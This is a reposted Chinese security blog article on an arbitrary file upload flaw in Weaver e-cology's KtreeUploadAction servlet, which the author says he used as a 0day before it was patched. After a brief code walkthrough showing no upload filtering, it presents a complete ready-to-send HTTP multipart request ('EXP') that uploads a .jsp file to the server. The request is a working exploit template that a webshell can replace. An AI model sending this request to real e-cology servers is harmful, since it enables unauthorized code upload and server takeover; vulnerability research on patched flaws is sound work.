泛微e-cology任意文件上传(已修复)

admin 2022年7月15日10:11:26评论1,615 views字数 1239阅读4分7秒阅读模式

转自:HALO环带

一直也在用的一个0day。但由于泛微去年更新了一个非常恶心的补丁包,导致此漏洞废了。至于是什么补丁后续有空在给大家分析。


直接给出定位文件:

ecologyCLASSB~1comweaverformmodelappsktreeservletKtreeUploadAction.class

泛微e-cology任意文件上传(已修复)

跟进uploadimage,看内部实现

泛微e-cology任意文件上传(已修复)

继续跟踪upload方法

泛微e-cology任意文件上传(已修复)

一览无余,无任何过滤操作,其实这里应该还需要跟进FileUploadFileNames(),但是也没必要,因为下面已经完成文件的写入

泛微e-cology任意文件上传(已修复)


直接丢EXP:

POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=testUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=--------1638451160Content-Length: 171
----------1638451160Content-Disposition: form-data; name="test"; filename="test.jsp"Content-Type: image/jpeg
helloword----------1638451160--


PS:漏洞已修复,遇到靠缘分。泛微法务别找我,只怪你问题太多。


如有侵权,请联系删除

泛微e-cology任意文件上传(已修复)


泛微e-cology任意文件上传(已修复)

推荐阅读   

【入门教程】常见的Web漏洞--XSS

【入门教程】常见的Web漏洞--SQL注入

sql注入--入门到进阶

短信验证码安全常见逻辑漏洞

最全常见Web安全漏洞总结及推荐解决方案

常见的Web应用的漏洞总结(原理、危害、防御)

代码审计常见漏洞总结

Web安全漏洞的靶场演示

13 款 Linux 比较实用的工具

xss攻击、绕过最全总结

泛微e-cology任意文件上传(已修复)

   学习更多技术,关注我:   

觉得文章不错给点个‘再看’吧

原文始发于微信公众号(编码安全研究):泛微e-cology任意文件上传(已修复)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月15日10:11:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微e-cology任意文件上传(已修复)http://cn-sec.com/archives/1179136.html

发表评论

匿名网友 填写信息